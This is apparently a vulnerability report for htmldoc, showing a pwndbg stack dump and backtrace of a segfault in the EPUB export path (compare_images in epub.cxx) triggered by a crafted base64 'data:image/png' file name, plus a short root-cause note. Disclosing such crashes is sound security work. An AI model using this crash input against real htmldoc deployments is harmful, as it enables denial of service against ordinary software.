    04:0020│      0x7fffffffd968 —▸ 0x555555aa8bf0 —▸ 0x555555aa8af0 —▸ 0x555555aa7f40 —▸ 0x555555aa65c0 ◂— ...
    05:0028│      0x7fffffffd970 —▸ 0x555555aa9200 —▸ 0x555555aa6340 ◂— 0x5555fbad2480
    06:0030│      0x7fffffffd978 —▸ 0x555555aa8fe0 ◂— 0x616d693a61746164 ('data:ima')
    07:0038│      0x7fffffffd980 —▸ 0x5555555cd04b ◂— 0x22263e3c00435253 /* 'SRC' */
    
    pwndbg> bt
    #0  __strcmp_avx2 () at ../sysdeps/x86_64/multiarch/strcmp-avx2.S:736
    #1  0x00007ffff7ca27c8 in __GI_bsearch (__key=0x7fffffffd9a0, __base=0x555555aa6bc0, __nmemb=<optimized out>, __size=8, __compar=0x55555555d609 <compare_images(char**, char**)>) at ../bits/stdlib-bsearch.h:33
    #2  0x000055555555d6ed in copy_image (zipc=zipc@entry=0x555555aa9200, filename=filename@entry=0x555555aa8fe0 "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAA,BlBMVEUAAAD///+l2Z/dAAAAM0lEQVR4nGP4/5/h/1+G/58ZDrAz3D/McH8yw83NDDeNGe4Ug9CLzwz3gVLMDA/A6P9/#FGGF\207jOXZtQAAAAAElFTkSuQmCC") at epub.cxx:1235
    #3  0x000055555555d81c in copy_images (zipc=zipc@entry=0x555555aa9200, t=0x555555aa8bf0, t@entry=0x555555aa65c0) at epub.cxx:1288
    #4  0x000055555555e813 in epub_export (document=0x555555aa65c0, toc=0x555555aa6760) at epub.cxx:211
    #5  0x000055555555d448 in main (argc=<optimized out>, argc@entry=4, argv=argv@entry=0x7fffffffe4e8) at htmldoc.cxx:1291
    #6  0x00007ffff7c820b3 in __libc_start_main (main=0x55555555af20 <main(int, char**)>, argc=4, argv=0x7fffffffe4e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe4d8) at ../csu/libc-start.c:308
    #7  0x000055555555d54e in _start () at htmldoc.cxx:1315
    
    

The bug locate in epub.cxx:1221 compare\_images. The arguments of compare\_images didn't checked so strcmp() lead a segfault due to to null pointer.

Reporter: chiba of topsec alphalab

Tag

#apple